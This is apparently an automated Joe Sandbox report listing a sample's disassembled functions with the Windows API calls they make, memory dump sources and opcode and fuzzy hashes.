Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8

Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
memset.MSVCRT ref: 0040E2D1

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5

Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,00989768,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
DeleteFileW.KERNELBASE(00000000,0040AE72,00989768,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A

Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7

Part of subcall function 0040ED40: HeapAlloc.KERNEL32(00980000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
Part of subcall function 0040ED40: HeapAlloc.KERNEL32(00980000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D

Function 0040B050 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
CloseHandle.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C

Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

GetShortPathNameW.KERNEL32(00989768,00989768,00002710), ref: 00402BE0

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(00980000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: cfac631ae7cd33a4d65e394df154e00cb069c5f6e8b89d171dcd20ffa90417b6
Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
Opcode Fuzzy Hash: cfac631ae7cd33a4d65e394df154e00cb069c5f6e8b89d171dcd20ffa90417b6
Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E

Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55

Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B

Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D

Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C

Non-executed Functions

Function 00402664 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685

Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

Part of subcall function 0040A300: memcpy.MSVCRT(?,00000000,00000000,?,?,004026B1,00989768,00989768,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000), ref: 0040A310

FreeResource.KERNEL32(?,00989768,00989768,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
Instruction ID: 5824db8a20ede0dd59727c61e03ef1c30c3ca7ac97c8101ba0d9721411e394a8
Opcode Fuzzy Hash: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
Instruction Fuzzy Hash: C9F0F871018305EFDB01BF61EC0182EBEA1FB54304F108C3EF488511B1D7378868AB5A

Function 0040EFF0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 698COMMONLIBRARYCODE

Download Yara Rule

Strings

L@A, xrefs: 0040F76B

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID: L@A
API String ID: 0-2003014581
Opcode ID: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
Instruction ID: 760e5a69b99611532abf888ee3aa0c8fba98c8b8d08d5900a10969fbbe7fd4b0
Opcode Fuzzy Hash: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
Instruction Fuzzy Hash: C042AD706047429FD724CF19C54472ABBE0BF84304F14863EE8589BB91D379E99ACF8A

Function 00405573 Relevance: 3.1, APIs: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00405593

Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A

GetVersionExW.KERNEL32(?), ref: 004055F2

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E

Function 00409FB0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409F70,00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000), ref: 0040A0EC
SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040A100

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
Instruction ID: ed707b84e897ebd9365ef63bb97156212438ba645da498dcb76798098b5433cd
Opcode Fuzzy Hash: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
Instruction Fuzzy Hash: 76E0C2B2508380FFC3108F20E94C687BBF4BB55741F00C93EA80A927A0CB748852EB1E

Function 0040B9C7 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 0040B9D9

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
Instruction ID: 7648e4874b510db5dc64b48861a8ad0d1bcfa4dcae448a9e57b277cf71a217b0
Opcode Fuzzy Hash: acd0e2443a16ad88af06146353a72dec412846ba3d60e1a872444779584cfac7
Instruction Fuzzy Hash: 43D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86

Function 0040FA68 Relevance: 2.1, Strings: 1, Instructions: 842COMMON

Download Yara Rule

Strings

hAA, xrefs: 0041031E

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID: hAA
API String ID: 0-1362906312
Opcode ID: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
Instruction ID: 061b60707f08a323de6ca22a374bc66059e0427017f59017a69891467563d259
Opcode Fuzzy Hash: 7fc8c6075135f61b4e465a5350afc3a94afa5303be66dee6bc8774c12ebf2cec
Instruction Fuzzy Hash: 0762AD71A047129FC718CF18C59066AB7E1FFC8304F144A3EE8969BB81D778E959CB85

Function 00411C20 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

hAA, xrefs: 00411FC6

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID: hAA
API String ID: 0-1362906312
Opcode ID: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
Instruction ID: f848a90908651b5095397da3da739fda65f55eeb17523120767d540d1063a6f3
Opcode Fuzzy Hash: 71dca1fec58b1161358ab28b524daf179a02b381705128614a2cde410d01d185
Instruction Fuzzy Hash: F0D1E7716083828FC704CF28C48066ABBE2FFD9304F144A6EE9D58B752D379D98ACB55

Function 00409FD0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 00409FD6

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C

Function 0040CF18 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction ID: 434e224409ee4b41571aafdaecae1a236b293988db59150c8aad3205160540e2
Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction Fuzzy Hash: 3E12C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685

Function 00410CA0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

